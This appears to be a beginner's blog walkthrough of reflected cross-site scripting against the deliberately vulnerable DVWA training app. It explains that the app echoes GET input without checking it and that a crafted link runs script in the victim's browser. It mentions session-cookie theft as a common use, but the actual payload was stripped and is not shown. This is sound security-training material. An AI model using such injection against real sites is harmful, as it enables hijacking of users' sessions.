I was in two minds on whether to write this up as Cross Site Scripting (XSS) is such a massive subject and this really just touches the foundations, however, I’ll give it a go.
What is Reflected Cross Site Scripting (XSS)? (From the OWASP website)
Reflected Cross–site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page.
Damn Vulnerable Web App
An excellent resource for any new person training in web application security. On clicking the “XSS (Reflected)” link you will see this screen.
A simple question. What is your name? When a name is entered it will be displayed back to you on the web page.
During testing, it seems that any data we enter is displayed back to us, and is contained in the core HTML code of the site.
If we look at the source PHP code for the app
The PHP code just uses the GET function to pull the entered ‘data’ and then display it back to the user. This could prove to be dangerous if there is no checking of the submitted data.
*Wordpress removes the script tags from the above code. See real URL below
When the link is executed by the victim, the screen should show a pop up alert with the number zero in it.
The browser will execute the code it is given which results in the alert box pop up. There are many uses for this kind of attack. A more common attack is to steal a users session cookie while they are still logged in meaning the attacker can be logged in as that user simultaneously.
How can we protect against this?
The next post will delve a little deeper into how the Medium and High settings try to prevent this attack but we can still get around the measures put in place to stop the attack.